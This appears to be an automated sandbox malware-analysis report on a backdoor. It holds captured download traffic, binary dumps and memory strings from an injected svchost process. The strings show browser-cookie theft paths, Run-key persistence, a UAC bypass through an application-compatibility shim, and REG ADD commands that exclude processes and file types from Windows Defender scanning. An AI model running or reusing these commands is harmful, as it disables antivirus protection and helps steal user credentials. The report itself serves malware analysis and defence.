.....).~'...9j..y#(........i../..<....R...".:13..KS.. h-[".0..^.V..2r....8...?.nl..c. 9..<ED)..-..2...7....u..f.V.......F..G..v.......f).qlz$.;..."...7%.C.7......7H^*........kh].<.D}..|....Az....~.._z#............lvP.-#...w#f...Np....[o. ..w&.c.X..0.....Z.....?z1s..~.....H*2...}.........GE._....r.W....(L.c ....I...R..h............(.........z.Wb..o...k.-LQi...~N....`yL... P.........u....!...... ..2.,..k.GN.:.f.W.|Ul.K..k..2. ....[B..a..%.........C.nY.'%.>.E.N@.1m`.Bd.)=.!...d..=....#s0,..FG/...8.%..evf.b.li........M..i ......Y. .|v.....L.B.=...>o....7..:....wt.B..%...A....#.a....p......H.z*}..V...........l.U.&.-....q.~H.?x..|.-.Q....h<=J...........e.M<z@=~\.J.......,s$..j....-bz.....u25&..;Md.n.L.........q.......V .....h................v..'.-vX.......as...:.k..I,I......1..)W.....'.P........j....%...o..|K....rq kNI."...]....y7BO.2....59W.2%y8P.....T....2..G........,.....n.\.b.../...X ...Tp...0.M.O..... ..}~..$.)..3C.i.O.x&\...W....1$H.&.........Q.]=.X..)...Rp..^Z..}.&$ .B....p.4..K..w.d;..-.`..............'.^^.B.?.m..[..I.......\?......./^.*..\f>....'-.......DXJ0_B..y&=?.....6~.m..A..Kvb.&.?..k...&_u...'.....Q..&...3.xc,....Zn...........u..c.I....3....<..p.s..C.y...P....N..Go...-O..).x.......aql....k2.$.`.3;.... ..#$.....vX..y..!..... ..._........h........i~.A..*.....H.A.y.n~J..k.r..\ .G...#.Lv,.....!..o..c.-V.......v.jA".k)!..:`T.......zp.A.7.h.D.Am.r.....C_..v@OW.../...8. p...?p.b.Q7(O79l.........I2l?........ra...85P...si....y$..^..0:3(........E.n. .^.?D..m..9...Q.-^..l.L2..oC.`t.E...
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=50331648-51380223
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:25 GMT
Content-Range: bytes 50331648-51380223/53784984
Content-Length: 1048576
Connection: keep-alive
7..${w}........?...oc..2.c..|..)m`.2uC.R^Bn.&.U....../.A.4.....jne...4B...2.i..}CB.8w.gnl.}..x.............pd..$L...X|@........m..Ag..k......6...h......~..o...........S.....n.....a{]..<.....M......S.........] ....i5]R..u.e.....F~."8...f..z. .&.)..=..7B..o.....x.h_.= . .f..fA.G...L.=Kp..k..l...vM0Q.......>...4.?.....2.......p.<...a....a......F..K.(..........@.]z.....6./k_.";.<>.... .l^Y ......*K..w ....'.a...{B.8....~.w..V#;...n!..46..Uy..7..&...H. ..%<......AG'..II....6x~.b.....{......{ ............z..k.kW.'L./0....c#..F..M.sKI..$..$(..=O._].17...~)....Y...<9.t.y...8.........C.}.~...<./&...8.o(s.)Yo....`..ct.w..Mg,3..N.........1..Ln...=...................".9.....M.r.F..|..>._..n". ....?.n4Y4./}../.......;]m.EP/..T..`...{(..H.uu...e9;.%.;..4.t..1...A...R....B.X_'.$.g....j.~.......6x........&,...6...b}...IlN.n^...!.........\..._..y0..n.....tP.i..|._.P.V..F..T.y.,...}k.....*Jd.4\.s......d........"].2.n.....W.7.....m.o.b^.S....Wq0..0......'.........>|.Pj.]...A.%c..2..!|..<~...k..lC5.u./.2.%]i..........p....k....)V......H.]2....J....Z/....X.FL..$...z4....../...g.Q..v.......Y..3.I....%)l.o..Zk,..=QUt..u.......`.../.J...:...Vv..0p..Q,bX9.j5........?....5.......j....Dfp.N.Z.{.....6_...(i.r............M..}u.....p.rS<.A@D.....E]..vvJ..d.>. &.L9....<..J.-.....^D....9wD..#.Y..".'s.5..L...T&.`.....b.j.. '(4./.).........~.J.JQ.}O.y....O\..&r.....H...s?l..W.m.......U/....*.m.a.i.6>.*......#.x.B*.|.....@...D.2.tZ)..V....:5.......=..<=.L\.k..6....9.$...FZ..N....L0`sEb....,........
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=51380224-52428799
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:25 GMT
Content-Range: bytes 51380224-52428799/53784984
Content-Length: 1048576
Connection: keep-alive
m"...(....Vy........<c.........e..r}...H.A.5...I../.}D.`^;..I.d.t...K. ._{...,..M.......S.F .k.s..{QX....!?....>..i7..L.t..{vF=...k..P.....M..d...........8S.E...Fyc..8..9.._.../..h6.U.]..q...pa........l...m\;....U.......O....2.~.J...S.B/..p2.5....rp.....Q..2...C...cYh..]Y.Dxy......8Jv.}....Wo?z*G.KTla..u..@.n......{.K....s..,R....%..t..89.m.{.z.8.J.xl8.g$...\..=.I.?.....h..E.cqsH..?...*#.C...f....e.^g..p,,...ZF.%!............%....=3?....l....Z..q..&7gwV.q4........N.....nP".Smu%./....;.B........C..9P..__...D....P..R.....O..S\Sm....H..Or..w.K.@.8...$...n.......)....].=.-J...L >3...ep.w...;....U.3Z...%"...,h.m5.....I#x.....S.B$.9....'.0O.`...<......~er.eNnrs.)..:c.......d"^SZ.{9...A..r.o..i@.c..t.Xf.......;...^....Lq.......P:........a...qFp'........J.x..r7.._;....Hju....,...zC..jr.:|...&.........J.c.....%..E.|q...SD.....HV....{yq-......[.........|f.z.S7.q.<K.....,.f......U....r...v...M...........[...^*/E..T.9A....36.^zIU.O.D'..V..}@.~.m.3J:. .#...|*=%.1..&......\T.;...Z.$.{.\1...S.. )C.T.x.r.R.s..x.<W..x'(!L....R*..2._.l..ar....m..~.....L... Qe:.KP...K..pQ...2....a..*>..i#.......63.tJ.,.........v..q.rT&.h.UN...........V.k....C>.I.t..-..61.......mU...R^7.80...y...x.P.$Ig.n9.8.;.... .~..,.. .k.i ....WU..'..au..*.....d.g...52....Q..LXV.,.*.......|.*.G.. .....$...K.=.<...z[......A....*.....L...>g..>.#.#..N..F?....X.......=..g)p.....f.T. TH3..F3.o.@...J..'...R..l....kO...#2&%..bCa.y9.f......T............;7....=<R9Zp...'.6.@.X.........`...n..3.....>.....N..$....7.s.|..d.YT.......@.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=52428800-53477375
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:26 GMT
Content-Range: bytes 52428800-53477375/53784984
Content-Length: 1048576
Connection: keep-alive
....sn....". .[T.w.D.p.....T92B....G.RYy-...P.. r....o.p././K[8.g.[..C.....u.f[..._Qs."d.Y.".*iVU......NRNUF.q...]..$*4, .qY!...L.....`......rK.....f..@!.w.t.vG... ..C...g./..N.....\^.tAa.."..D..><4...Q..8.D..VE. ......!7..\./6.....e...6.$o.U....e[....5n.....x..u..P..qj.x.Z{.6.....Q..^4......EA....o.(.4.d..v.% ..C3.dA.,.W..n.}......y..[....Pnh.........4.u........?.......*....$Z...\F...M..ZDVz...b7....s..........~`0T.L...."a.v..`.<.j5..m.x.x.2..nI..Sd..j%..:....n...0.I...Ht..&......'..Y.x.Ah.h".Z..j."...3...!/y....u2:J.%.*W...E'.Y2..J...}. 4/;........W._*X..j.R....T"..b5..^.....K\P..H.{.t..R......|..#...,S.wPJ...,.(.OA..w..........=..!.d...mf..ah;...@.%...oD.e.z..pI.Ep.m-.`.>.A...w%R..RY\..Id9....@..{.......P/`NQz.Hy.4.....%LF.e|X:.K.46......... ..j..p....=.(d..1,.V..6.s]=...T....%.@...?I..dH..Nx... N....:.)=J../...K^Gp...\...../l.tqu.....*>.....BW..Ta..9.Y......\s....9.....V.e@Y?.S.......)....ii`.c_.. .*..d...@.s.;.v.`.O4...1...E..|^........4..?P...ft..y.."a.....?.......:..n....L~...`-...........0.D...wK.I3S.[........MZQ0.[....~.[..UF-...&..E.@Y./......K..q.a..?.....'*....."...}QI.A....Y.9....GrV|.G..e.>%...w...ib..}..v.....0..R.A....\.....4Z.(r.MG...N.\$zU.......[,(.KS.T..;FQ.5.'.../...a.Y)..K....*[.x....wj.z..S.<.> ...q.i;..S.......p........N...B@.lT.....t.,!!.....n.x~o).....J"....\.......E.....OH3..-R(ZSr....g\....k..=.....]_.>=..>...K...J.....S... ....`..`.O.m..S..B....eMPu......@P.Ed0... 5..U..Q.f.gJ3&.B.Hd}.....DSD:3[.{.U..._......2....4AN....B.y...lEGU,..*..n...'`9.....i..".
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=53477376-53784983
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:26 GMT
Content-Range: bytes 53477376-53784983/53784984
Content-Length: 307608
Connection: keep-alive
i...h....."<6.W..~..-[..C....%9..(;.....C....]&"..6...=.)..dC..........C...&.i....b..VX../$. shX....2...~.....B..b..Q..i....LUi...>6R.v.ZSz...."...W..o.._. To.........Z.l.....l.-C.$k5eO.....c.|..s.)w%<.6..g.C.....y....b..d..".C.............T:"..4.4...!...z h.Y g.....`\....>B0.............d.P..N...s....z.7.....D.K.yO.NF..>>....5......_..e.....p#..f...z.r<d.Em..n.....}O-......;G%)A..,..v..<.\.f.....Ck%gN#.....{..J.....fd.h...*.....;..r.,%.k..'.._;.b...A.Eh.e..*$/ .......(.........G.^/...J.p..m...JN.QK.k.....i[DP.......(q..........t../.,...m..,..Tt.K..ueM.9..e./.tA.T....,.s..M....Q.c/...:.......E.g;....JVC7.1...~a.wK.p...aL..!.G...4.P.....Kw.....|....c.Fr....}.*.G...$'.W....&j........0......\....GD:....x..:w..?.....f^5g....n*....VE.)a.^..h...4..Ja.3(.dC.^.C...G..j.U..mY.z....BNN."/......o..X^4W.h...GZo*...iN.ajN.0#....sb.......Kql...lG.'P.U.Z....x.8....hx...9{......G...i.z(.=.MV...b[..<.'.....[.:.a.T.....@'......5..A..^.0u4=t.[.S...ef..%.f3...TP......"....~.G...r..bN....:S......u ..\....L.....6.@e.%cp.d...w.6.6 I..//0...J....aB...,m..~..O.4=..~*4..}.x...W.6....hag{.w.~.D...s?...L...y.^....q......F.o>.Dm~..G?F..[..Q......).#.&.E..`}.Xt.K...O;.{=5;...^wp..A...w..6...Z..U7/...u..An...%....|.....:...,.:...G...`{jw?F.G(.T)A...>......_.pz^w..^6G.b^q`.!........."...t.7J.........W./.Z3.....c....#..........}....NpNi.v..y.E..zR..\N.tpJ}....e\...#.E....\..%.&...a]/g/..$~..9....]i.:...!..P........,O..=..ZC............p..R.....%....=..W.....$#>...:...7.V.E..L..w..U.X.....V/.....<[..Q..w_
<<< skipped >>>
Map
The Backdoor connects to the servers at the folowing location(s):
Strings from Dumps
svchost.exe_1980:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
RPCRT4.dll
RPCRT4.dll
NETAPI32.dll
NETAPI32.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
NtOpenKey
NtOpenKey
svchost.pdb
svchost.pdb
\PIPE\
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
svchost.exe_1980_rwx_002B0000_00001000:
|C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
|C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
svchost.exe_1980_rwx_15190000_0003D000:
`.rsrc
`.rsrc
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
Gh.logWj
Gh.logWj
h.logPj
h.logPj
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
kernel32.dll
kernel32.dll
ExitWindowsEx
ExitWindowsEx
user32.dll
user32.dll
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
advapi32.dll
advapi32.dll
modules.dll
modules.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
\\.\pipe\
\\.\pipe\
VWRQRh.exe
VWRQRh.exe
h.exe
h.exe
ws2_32.dll
ws2_32.dll
RegCreateKeyExA
RegCreateKeyExA
ShellExecuteA
ShellExecuteA
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
rmnsoft.dll
rmnsoft.dll
google.com:80
google.com:80
bing.com:80
bing.com:80
yahoo.com:80
yahoo.com:80
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
Windows Defender
Software\Microsoft\Windows\CurrentVersion\Policies
Software\Microsoft\Windows\CurrentVersion\Policies
Software\Microsoft\Windows\CurrentVersion\Policies\Associations
Software\Microsoft\Windows\CurrentVersion\Policies\Associations
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\CurrentVersion\policies\system
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
"ntdll.dll
"ntdll.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
\\.\131D2408D44C4f47AC647AB96987D4D5
\\.\131D2408D44C4f47AC647AB96987D4D5
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Extension Cookies
\Google\Chrome\User Data\Default\Extension Cookies
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Mozilla\Firefox\
%APPDATA%\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
profiles.ini
profiles.ini
Profile%d
Profile%d
\cookies.txt
\cookies.txt
\cookies.sqlite
\cookies.sqlite
%APPDATA%\Opera\
%APPDATA%\Opera\
\profile\cookies4.dat
\profile\cookies4.dat
\cookies4.dat
\cookies4.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.sqlite
FireFox Cookies\Profile %d\cookies.sqlite
Chrome\Cookies
Chrome\Cookies
Chrome\Extension Cookies
Chrome\Extension Cookies
Opera\Profile %d\cookies4.dat
Opera\Profile %d\cookies4.dat
Safari\Cookies.plist
Safari\Cookies.plist
1etexec
1etexec
complete.dat
complete.dat
SRQVWh.exe
SRQVWh.exe
h.exeVj
h.exeVj
h.exeh$~
h.exeh$~
tvh.exe
tvh.exe
PSSSSSSh
PSSSSSSh
More information: hXXp://VVV.ibsensoftware.com/
More information: hXXp://VVV.ibsensoftware.com/
Advapi32.dll
Advapi32.dll
RegDeleteKeyExA
RegDeleteKeyExA
com.%s.sdb
com.%s.sdb
%s\cmd.%s.bat
%s\cmd.%s.bat
start "" "%s"
start "" "%s"
"%%windir%%\%s\iscsicli.exe"
"%%windir%%\%s\iscsicli.exe"
/q "%s"
/q "%s"
\system32\sdbinst.exe"
\system32\sdbinst.exe"
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\
\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb
\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb
/q /u "%s"
/q /u "%s"
SOFTWARE\Microsoft\Windows NT\CurrentVersion\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\
SOFTWARE\Microsoft\Updates\Windows XP\SP4
SOFTWARE\Microsoft\Updates\Windows XP\SP4
SOFTWARE\Microsoft\Updates\Windows XP\SP3
SOFTWARE\Microsoft\Updates\Windows XP\SP3
SOFTWARE\Microsoft\Updates\Windows XP\SP10
SOFTWARE\Microsoft\Updates\Windows XP\SP10
SOFTWARE\Microsoft\Updates\Windows XP\SP0
SOFTWARE\Microsoft\Updates\Windows XP\SP0
SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages
SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages
:Zone.Identifier:$DATA
:Zone.Identifier:$DATA
:Zone.Identifier
:Zone.Identifier
svchost.exe
svchost.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
spoolsv.exe
spoolsv.exe
..\p.exe
..\p.exe
CheckBypassed ok
CheckBypassed ok
loader.exe
loader.exe
_CheckBypassed@0
_CheckBypassed@0
|GetWindowsDirectoryA
|GetWindowsDirectoryA
\/{X-X-X-X-XX}
\/{X-X-X-X-XX}
|ZwDelayExecution
|ZwDelayExecution
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles%\Internet Explorer\iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
http\shell\open\command
http\shell\open\command
chrome.exe
chrome.exe
opera.exe
opera.exe
cmd.exe
cmd.exe
/C ""%s"" %s
/C ""%s"" %s
/C ""%s""
/C ""%s""
user32.DLL
user32.DLL
p.exe
p.exe
Rapport
Rapport
1onsent.exe
1onsent.exe
&.bAp
&.bAp
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\p.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\p.exe
GetProcessHeap
GetProcessHeap
RegEnumKeyA
RegEnumKeyA
RegOpenKeyA
RegOpenKeyA
ShellExecuteExA
ShellExecuteExA
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHook
UnhookWindowsHook
EnumWindows
EnumWindows
.rdata
.rdata
.rsrc
.rsrc
PF8-.XU
PF8-.XU
O3$dS7"%U9
O3$dS7"%U9
KERNEL32.DLL
KERNEL32.DLL
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
multipart/*boundary={*}application/x-www-form-urlencodedname="{*}"{*}hXXps://hXXp://
2.1.0.3
2.1.0.3
iscsicli.exe
iscsicli.exe
RedirectEXE
RedirectEXE
%temp%\..\..\LocalLow\cmd.%username%.bat
%temp%\..\..\LocalLow\cmd.%username%.bat
emsseces.exe
emsseces.exe
svchost.exe_1980_rwx_20010000_00001000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
svchost.exe_1512:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
RPCRT4.dll
RPCRT4.dll
NETAPI32.dll
NETAPI32.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
NtOpenKey
NtOpenKey
svchost.pdb
svchost.pdb
\PIPE\
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
svchost.exe_1512_rwx_002B0000_00001000:
|C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
|C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
svchost.exe_1512_rwx_15190000_0003D000:
`.rsrc
`.rsrc
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
Gh.logWj
Gh.logWj
h.logPj
h.logPj
